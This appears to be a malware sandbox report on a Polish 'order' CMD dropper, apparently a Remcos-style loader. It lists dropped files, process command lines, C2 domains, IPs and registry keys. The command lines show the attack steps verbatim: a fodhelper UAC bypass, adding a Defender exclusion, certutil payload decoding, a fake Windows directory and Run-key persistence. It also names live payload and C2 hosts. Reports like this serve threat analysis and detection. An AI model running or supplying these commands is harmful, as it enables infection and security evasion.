Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Zam#U00f3wienie_27900045542300.CMD.cmd
|
Unicode text, UTF-8 text, with very long lines (2868), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\Public\Clwwfhzo.url
|
MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Clwwfhzo.PIF">), ASCII text, with CRLF line
terminators
|
dropped
|
|
|
|
C:\Users\Public\Libraries\Clwwfhzo
|
data
|
dropped
|
|
|
|
C:\Users\Public\Libraries\Clwwfhzo.PIF
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\Public\Libraries\Lewxa.com
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Windows \System32\7922836.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Windows \System32\netutils.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Users\Public\Lewxa.txt
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\Public\Libraries\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\Public\alpha.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
modified
|
||
|
C:\Users\Public\kn.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
modified
|
||
|
C:\Users\Public\xkn.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xkn.exe.log
|
CSV text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aarqkiin.xxk.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dncaohnh.xgv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p3guirpa.a0t.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tytwoaxk.sk2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xxrtx1ko.px2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ya15wy4u.qfa.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows \System32\KDECO.bat
|
DOS batch file, Unicode text, UTF-8 text, with very long lines (432), with CRLF line terminators
|
dropped
|
||
|
\Device\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 13 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Zam#U00f3wienie_27900045542300.CMD.cmd" "
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
|
|
|
|
C:\Windows\System32\extrac32.exe
|
extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
|
|
|
|
C:\Windows\System32\extrac32.exe
|
extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
|
|
|
|
C:\Windows\System32\extrac32.exe
|
extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command
/f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start
fodhelper.exe "
|
|
|
|
C:\Users\Public\xkn.exe
|
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command
/f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start
fodhelper.exe "
|
|
|
|
C:\Users\Public\alpha.exe
|
"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn
-WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
|
|
|
|
C:\Windows\System32\reg.exe
|
reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden
-Command Add-MpPreference -ExclusionPath C:\Users "
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Zam#U00f3wienie_27900045542300.CMD.cmd"
"C:\\Users\\Public\\Lewxa.txt" 9
|
|
|
|
C:\Users\Public\kn.exe
|
C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Zam#U00f3wienie_27900045542300.CMD.cmd" "C:\\Users\\Public\\Lewxa.txt"
9
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com"
12
|
|
|
|
C:\Users\Public\kn.exe
|
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
|
|
|
|
C:\Users\Public\Libraries\Lewxa.com
|
C:\\Users\\Public\\Libraries\\Lewxa.com
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
cmd /c mkdir "\\?\C:\Windows "
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
cmd /c mkdir "\\?\C:\Windows \System32"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
cmd /c "C:\Windows \System32\7922836.exe"
|
|
|
|
C:\Windows \System32\7922836.exe
|
"C:\Windows \System32\7922836.exe"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
|
|
|
|
C:\Windows\SysWOW64\extrac32.exe
|
C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Lewxa.com C:\\Users\\Public\\Libraries\\Clwwfhzo.PIF
|
|
|
|
C:\Windows\SysWOW64\SndVol.exe
|
C:\Windows\System32\SndVol.exe
|
|
|
|
C:\Users\Public\Libraries\Clwwfhzo.PIF
|
"C:\Users\Public\Libraries\Clwwfhzo.PIF"
|
|
|
|
C:\Windows\SysWOW64\colorcpl.exe
|
C:\Windows\System32\colorcpl.exe
|
|
|
|
C:\Users\Public\Libraries\Clwwfhzo.PIF
|
"C:\Users\Public\Libraries\Clwwfhzo.PIF"
|
|
|
|
C:\Windows\SysWOW64\colorcpl.exe
|
C:\Windows\System32\colorcpl.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\SystemSettingsAdminFlows.exe
|
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
|
||
|
C:\Windows\System32\taskkill.exe
|
taskkill /F /IM SystemSettings.exe
|
||
|
C:\Windows\System32\taskkill.exe
|
taskkill /F /IM SystemSettingsAdminFlows.exe
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
There are 35 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
!htalatsuirity.ddnsfree.com
|
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
|
|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
|
|
|
https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
|
unknown
|
||
|
https://login.microsoftonline.com/%s/oauth2/authorize
|
unknown
|
||
|
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
|
unknown
|
||
|
http://ocsp.sectigo.com0
|
unknown
|
||
|
https://go.microsoft.co
|
unknown
|
||
|
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://github.com/ch2sh/BatCloakG
|
unknown
|
||
|
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
|
unknown
|
||
|
http://geoplugin.net/json.gp5
|
unknown
|
||
|
https://enterpriseregistration.windows.net/EnrollmentServer/key/
|
unknown
|
||
|
https://onedrive.live.com/
|
unknown
|
||
|
https://login.windows.local
|
unknown
|
||
|
http://geoplugin.net/json.gpP
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://live.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://onedrive.live.com/download?resid=F8C2FFBD7FDE3058%21109&authkey=
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://%ws/%ws_%ws_%ws/service.svc/%ws
|
unknown
|
||
|
https://enterpriseregistration.windows.net/EnrollmentServer/device/
|
unknown
|
||
|
https://dztchg.bl.files.1drv.com/y4mehZc5BynsDMfJX6uNk2OZuOk6aKCOdUy2pWop0SAqNiM54FnD7EXoVwTl49wu1_q
|
unknown
|
||
|
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
|
unknown
|
||
|
https://onedrive.live.com/download?resid=F8C2FFBD7FDE3058%21109&authkey=!AGjZ9DjRybSg7WA
|
13.107.137.11
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
https://sectigo.com/CPS0
|
unknown
|
||
|
https://login.microsoftonline.com/%s/oauth2/token
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://leibk.com/pufpufooootools/150_Clwwfhzotee
|
193.143.77.18
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://leibk.com:443/pufpufooootools/150_Clwwfhzotee
|
unknown
|
||
|
https://leibk.com/
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://geoplugin.net/json.gpSystem32
|
unknown
|
||
|
https://onedrive.live.com/download?resid
|
unknown
|
||
|
https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
|
unknown
|
||
|
http://geoplugin.net/
|
unknown
|
||
|
https://dztchg.bl.files.1drv.com/
|
unknown
|
||
|
https://onedrive.live.com/download?resid=F8C2FFBD7FDE3058%21109&u
|
unknown
|
||
|
https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://www.pmail.com
|
unknown
|
||
|
http://geoplugin.net/json.gp~6~
|
unknown
|
||
|
http://ocsp.sectigo.com0C
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 41 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
dual-spov-0006.spov-msedge.net
|
13.107.137.11
|
|
|
|
cxcs.microsoft.net
|
unknown
|
|
|
|
setimetntalatsuirity.ddnsfree.com
|
94.156.69.245
|
||
|
leibk.com
|
193.143.77.18
|
||
|
geoplugin.net
|
178.237.33.50
|
||
|
onedrive.live.com
|
unknown
|
||
|
dztchg.bl.files.1drv.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
13.107.137.11
|
dual-spov-0006.spov-msedge.net
|
United States
|
|
|
|
193.143.77.18
|
leibk.com
|
Poland
|
||
|
94.156.69.245
|
setimetntalatsuirity.ddnsfree.com
|
Bulgaria
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Clwwfhzo
|
|
|
|
HKEY_CURRENT_USER_Classes\ms-settings\shell\open\command
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7
|
Name
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7
|
Name
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7
|
Name
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc00-CS8S4A
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc00-CS8S4A
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc00-CS8S4A
|
time
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
|
@%systemroot%\system32\colorui.dll,-1400
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ICM\ProfileAssociations\Print\Fax
|
UsePerUserProfiles
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
4031000
|
direct allocation
|
page execute read
|
|
|
|
35B0000
|
heap
|
page read and write
|
|
|
|
287C000
|
heap
|
page read and write
|
|
|
|
284F000
|
heap
|
page read and write
|
|
|
|
3599000
|
heap
|
page read and write
|
|
|
|
7190000
|
remote allocation
|
page execute and read and write
|
|
|
|
3FC1000
|
direct allocation
|
page execute read
|
|
|
|
2D3A000
|
heap
|
page read and write
|
|
|
|
7FC90000
|
direct allocation
|
page read and write
|
|
|
|
2D3A000
|
heap
|
page read and write
|
|
|
|
3547000
|
heap
|
page read and write
|
|
|
|
3FA1000
|
direct allocation
|
page execute read
|
|
|
|
35AE000
|
heap
|
page read and write
|
|
|
|
6950000
|
remote allocation
|
page execute and read and write
|
|
|
|
5300000
|
remote allocation
|
page execute and read and write
|
|
|
|
21B3000
|
direct allocation
|
page read and write
|
|
|
|
400000
|
direct allocation
|
page execute and read and write
|
|
|
|
400000
|
direct allocation
|
page execute and read and write
|
|
|
|
400000
|
direct allocation
|
page execute and read and write
|
|
|
|
26F69A2B000
|
heap
|
page read and write
|
||
|
26E4EE65000
|
heap
|
page read and write
|
||
|
2857000
|
heap
|
page read and write
|
||
|
27B09515000
|
heap
|
page read and write
|
||
|
7D2000
|
heap
|
page read and write
|
||
|
A94D87E000
|
stack
|
page read and write
|
||
|
26F6B3F0000
|
heap
|
page read and write
|
||
|
7FF6C3670000
|
unkown
|
page readonly
|
||
|
7FF6C36A2000
|
unkown
|
page readonly
|
||
|
285C000
|
heap
|
page read and write
|
||
|
7FF6C36AD000
|
unkown
|
page write copy
|
||
|
492F000
|
stack
|
page read and write
|
||
|
7FF7E1A76000
|
unkown
|
page readonly
|
||
|
7FBA0000
|
direct allocation
|
page read and write
|
||
|
246EE580000
|
heap
|
page read and write
|
||
|
7FF738F6D000
|
unkown
|
page readonly
|
||
|
15271770000
|
heap
|
page read and write
|
||
|
2A69000
|
stack
|
page read and write
|
||
|
33F0000
|
heap
|
page read and write
|
||
|
1F400DCC000
|
heap
|
page read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page execute and read and write
|
||
|
841000
|
heap
|
page read and write
|
||
|
7FF738F6C000
|
unkown
|
page write copy
|
||
|
1C132BC0000
|
heap
|
page read and write
|
||
|
7DD000
|
heap
|
page read and write
|
||
|
7FF6C36AD000
|
unkown
|
page write copy
|
||
|
7FFD9BB92000
|
trusted library allocation
|
page read and write
|
||
|
7FF6C36C9000
|
unkown
|
page readonly
|
||
|
2743000
|
heap
|
page read and write
|
||
|
323C000
|
stack
|
page read and write
|
||
|
23FE09E0000
|
heap
|
page read and write
|
||
|
20B1963D000
|
heap
|
page read and write
|
||
|
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
|
152718E0000
|
heap
|
page read and write
|
||
|
489A5FE000
|
stack
|
page read and write
|
||
|
2A08000
|
direct allocation
|
page read and write
|
||
|
7F670000
|
direct allocation
|
page read and write
|
||
|
9B5B07B000
|
stack
|
page read and write
|
||
|
1F1B27F0000
|
heap
|
page read and write
|
||
|
4CB000
|
unkown
|
page read and write
|
||
|
29EDF970000
|
heap
|
page read and write
|
||
|
72F000
|
stack
|
page read and write
|
||
|
1F1B3CB9000
|
trusted library allocation
|
page read and write
|
||
|
20B1965F000
|
heap
|
page read and write
|
||
|
7F610000
|
direct allocation
|
page read and write
|
||
|
20D69620000
|
heap
|
page read and write
|
||
|
1CD34745000
|
heap
|
page read and write
|
||
|
7C86B4E000
|
stack
|
page read and write
|
||
|
27B09514000
|
heap
|
page read and write
|
||
|
4CD000
|
unkown
|
page read and write
|
||
|
7DF465A40000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F400D9C000
|
heap
|
page read and write
|
||
|
7FF6C36B1000
|
unkown
|
page read and write
|
||
|
2B7F000
|
stack
|
page read and write
|
||
|
41957FF000
|
stack
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page execute and read and write
|
||
|
21A42840000
|
heap
|
page read and write
|
||
|
1F400DAD000
|
heap
|
page read and write
|
||
|
27B09515000
|
heap
|
page read and write
|
||
|
7F3E0000
|
direct allocation
|
page read and write
|
||
|
2840000
|
direct allocation
|
page read and write
|
||
|
20E1C066000
|
heap
|
page read and write
|
||
|
474000
|
direct allocation
|
page execute and read and write
|
||
|
3587000
|
heap
|
page read and write
|
||
|
7FF7E1A5A000
|
unkown
|
page write copy
|
||
|
222F000
|
direct allocation
|
page read and write
|
||
|
7FF6C3670000
|
unkown
|
page readonly
|
||
|
235F5860000
|
heap
|
page read and write
|
||
|
1F1B3F9F000
|
trusted library allocation
|
page read and write
|
||
|
7FF7E1A68000
|
unkown
|
page read and write
|
||
|
7FF6C3670000
|
unkown
|
page readonly
|
||
|
15FF1000
|
heap
|
page read and write
|
||
|
7FF6C36B9000
|
unkown
|
page read and write
|
||
|
845000
|
heap
|
page read and write
|
||
|
299F000
|
direct allocation
|
page read and write
|
||
|
6F5000
|
heap
|
page read and write
|
||
|
154CE000
|
stack
|
page read and write
|
||
|
87D000
|
heap
|
page read and write
|
||
|
1F1B27F5000
|
heap
|
page read and write
|
||
|
7FF6C36B1000
|
unkown
|
page read and write
|
||
|
7FF6C36C9000
|
unkown
|
page readonly
|
||
|
15870000
|
remote allocation
|
page read and write
|
||
|
35B0000
|
heap
|
page read and write
|
||
|
2CFF000
|
stack
|
page read and write
|
||
|
31AE000
|
heap
|
page read and write
|
||
|
7FF6C3670000
|
unkown
|
page readonly
|
||
|
2B76000
|
heap
|
page read and write
|
||
|
61E000
|
stack
|
page read and write
|
||
|
7F640000
|
direct allocation
|
page read and write
|
||
|
21A42830000
|
heap
|
page read and write
|
||
|
620000
|
heap
|
page read and write
|
||
|
319B000
|
heap
|
page read and write
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
2828000
|
heap
|
page read and write
|
||
|
7EDD0000
|
direct allocation
|
page read and write
|
||
|
4114000
|
direct allocation
|
page read and write
|
||
|
15DA9000
|
heap
|
page read and write
|
||
|
7FF6C36AD000
|
unkown
|
page read and write
|
||
|
1F1CB156000
|
heap
|
page read and write
|
||
|
248FE177000
|
heap
|
page read and write
|
||
|
2242000
|
direct allocation
|
page read and write
|
||
|
1E61E000
|
stack
|
page read and write
|
||
|
2C60000
|
heap
|
page read and write
|
||
|
7FBA0000
|
direct allocation
|
page read and write
|
||
|
9B5ABAD000
|
stack
|
page read and write
|
||
|
1F1CAD20000
|
heap
|
page execute and read and write
|
||
|
14C571E0000
|
heap
|
page read and write
|
||
|
2210000
|
heap
|
page read and write
|
||
|
29EDF940000
|
heap
|
page read and write
|
||
|
1F400D8F000
|
heap
|
page read and write
|
||
|
7FF6C3670000
|
unkown
|
page readonly
|
||
|
7F640000
|
direct allocation
|
page read and write
|
||
|
7FF7E18E1000
|
unkown
|
page execute read
|
||
|
827000
|
heap
|
page read and write
|
||
|
7FFD9B9B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2896000
|
direct allocation
|
page read and write
|
||
|
257B000
|
stack
|
page read and write
|
||
|
7FF7E1A5A000
|
unkown
|
page write copy
|
||
|
22C0000
|
heap
|
page read and write
|
||
|
7FF7E1A6D000
|
unkown
|
page readonly
|
||
|
2628000
|
direct allocation
|
page read and write
|
||
|
7FF7E1A78000
|
unkown
|
page readonly
|
||
|
7FF6C36AD000
|
unkown
|
page read and write
|
||
|
A1E000
|
stack
|
page read and write
|
||
|
B1DDCFF000
|
stack
|
page read and write
|
||
|
14C571A0000
|
heap
|
page read and write
|
||
|
8AB000
|
heap
|
page read and write
|
||
|
895000
|
heap
|
page read and write
|
||
|
1F1B27FA000
|
heap
|
page read and write
|
||
|
7DA000
|
heap
|
page read and write
|
||
|
7FF7E19FE000
|
unkown
|
page readonly
|
||
|
26F69A2B000
|
heap
|
page read and write
|
||
|
22D000
|
stack
|
page read and write
|
||
|
7FF62275A000
|
unkown
|
page readonly
|
||
|
2D58000
|
heap
|
page read and write
|
||
|
7FF6C36AD000
|
unkown
|
page write copy
|
||
|
7FF7E1A6D000
|
unkown
|
page readonly
|
||
|
1D6D0D30000
|
heap
|
page read and write
|
||
|
2649000
|
direct allocation
|
page read and write
|
||
|
23FE09D0000
|
heap
|
page read and write
|
||
|
1F400C20000
|
heap
|
page read and write
|
||
|
305A000
|
heap
|
page read and write
|
||
|
3FCC000
|
direct allocation
|
page read and write
|
||
|
1560E000
|
stack
|
page read and write
|
||
|
1571F000
|
stack
|
page read and write
|
||
|
2AF989A0000
|
heap
|
page read and write
|
||
|
F1CAEFF000
|
stack
|
page read and write
|
||
|
7F44F000
|
direct allocation
|
page read and write
|
||
|
2971000
|
direct allocation
|
page read and write
|
||
|
2963000
|
direct allocation
|
page read and write
|
||
|
7FF6C36AD000
|
unkown
|
page read and write
|
||
|
246EE590000
|
heap
|
page read and write
|
||
|
2638000
|
direct allocation
|
page read and write
|
||
|
4840000
|
heap
|
page read and write
|
||
|
1F400DC9000
|
heap
|
page read and write
|
||
|
7FF6C36AD000
|
unkown
|
page write copy
|
||
|
26F69A28000
|
heap
|
page read and write
|
||
|
29E4000
|
direct allocation
|
page read and write
|
||
|
15800000
|
trusted library allocation
|
page read and write
|
||
|
20B195A0000
|
heap
|
page read and write
|
||
|
338F000
|
unkown
|
page read and write
|
||
|
7FD80000
|
direct allocation
|
page read and write
|
||
|
1F1B2660000
|
heap
|
page read and write
|
||
|
1F1C2B50000
|
trusted library allocation
|
page read and write
|
||
|
CCEE5FF000
|
stack
|
page read and write
|
||
|
2320000
|
heap
|
page read and write
|
||
|
7F520000
|
direct allocation
|
page read and write
|
||
|
7FF7E1A63000
|
unkown
|
page read and write
|
||
|
34CF000
|
stack
|
page read and write
|
||
|
15B6D000
|
heap
|
page read and write
|
||
|
1F400D00000
|
heap
|
page read and write
|
||
|
7FF6C36A2000
|
unkown
|
page readonly
|
||
|
7FF7E18E1000
|
unkown
|
page execute read
|
||
|
7FF6C3670000
|
unkown
|
page readonly
|
||
|
613C9000
|
unkown
|
page readonly
|
||
|
45F000
|
unkown
|
page read and write
|
||
|
627000
|
heap
|
page read and write
|
||
|
246EE7D0000
|
heap
|
page read and write
|
||
|
7FF000
|
stack
|
page read and write
|
||
|
1F1CAE44000
|
heap
|
page read and write
|
||
|
849000
|
heap
|
page read and write
|
||
|
27B09513000
|
heap
|
page read and write
|
||
|
2F8F000
|
stack
|
page read and write
|
||
|
160DE000
|
heap
|
page read and write
|
||
|
2871000
|
heap
|
page read and write
|
||
|
7FF6C36C9000
|
unkown
|
page readonly
|
||
|
3556000
|
heap
|
page read and write
|
||
|
7EEE0000
|
direct allocation
|
page read and write
|
||
|
7F480000
|
direct allocation
|
page read and write
|
||
|
7FF738F6C000
|
unkown
|
page read and write
|
||
|
7FF738F50000
|
unkown
|
page readonly
|
||
|
235F56B0000
|
heap
|
page read and write
|
||
|
3280000
|
heap
|
page read and write
|
||
|
15FF0000
|
heap
|
page read and write
|
||
|
2BDE000
|
stack
|
page read and write
|
||
|
9B5AEFD000
|
stack
|
page read and write
|
||
|
271E3207000
|
heap
|
page read and write
|
||
|
7FF6C36C9000
|
unkown
|
page readonly
|
||
|
7FF6C3671000
|
unkown
|
page execute read
|
||
|
1F1B0E60000
|
heap
|
page read and write
|
||
|
7FFD9BCC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF738F50000
|
unkown
|
page readonly
|
||
|
7FF6C3671000
|
unkown
|
page execute read
|
||
|
7FF6C3671000
|
unkown
|
page execute read
|
||
|
27B09759000
|
heap
|
page read and write
|
||
|
7FF6C36BF000
|
unkown
|
page read and write
|
||
|
2535000
|
stack
|
page read and write
|
||
|
1F1B3FA7000
|
trusted library allocation
|
page read and write
|
||
|
854000
|
heap
|
page read and write
|
||
|
291B000
|
heap
|
page read and write
|
||
|
7FF6C36BF000
|
unkown
|
page read and write
|
||
|
7FF622750000
|
unkown
|
page readonly
|
||
|
20B19659000
|
heap
|
page read and write
|
||
|
221C000
|
stack
|
page read and write
|
||
|
7FF6C3671000
|
unkown
|
page execute read
|
||
|
1C130E84000
|
heap
|
page read and write
|
||
|
15FF3000
|
heap
|
page read and write
|
||
|
489A47B000
|
stack
|
page read and write
|
||
|
645000
|
heap
|
page read and write
|
||
|
1CD34950000
|
heap
|
page read and write
|
||
|
7FF7E1A76000
|
unkown
|
page readonly
|
||
|
1F1B4766000
|
trusted library allocation
|
page read and write
|
||
|
1536F000
|
stack
|
page read and write
|
||
|
1F400D35000
|
heap
|
page read and write
|
||
|
2B70000
|
heap
|
page read and write
|
||
|
26F699A0000
|
heap
|
page read and write
|
||
|
27B09514000
|
heap
|
page read and write
|
||
|
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
|
3D13CD000
|
stack
|
page read and write
|
||
|
2AF988A7000
|
heap
|
page read and write
|
||
|
84F000
|
heap
|
page read and write
|
||
|
693000
|
heap
|
page read and write
|
||
|
271E33D0000
|
heap
|
page read and write
|
||
|
227E000
|
stack
|
page read and write
|
||
|
64E000
|
stack
|
page read and write
|
||
|
26F69980000
|
heap
|
page read and write
|
||
|
27B09516000
|
heap
|
page read and write
|
||
|
2CBD000
|
stack
|
page read and write
|
||
|
9BF000
|
stack
|
page read and write
|
||
|
26E4EB80000
|
heap
|
page read and write
|
||
|
29D6000
|
direct allocation
|
page read and write
|
||
|
20B19610000
|
heap
|
page read and write
|
||
|
15A293E000
|
stack
|
page read and write
|
||
|
7FF6C36B1000
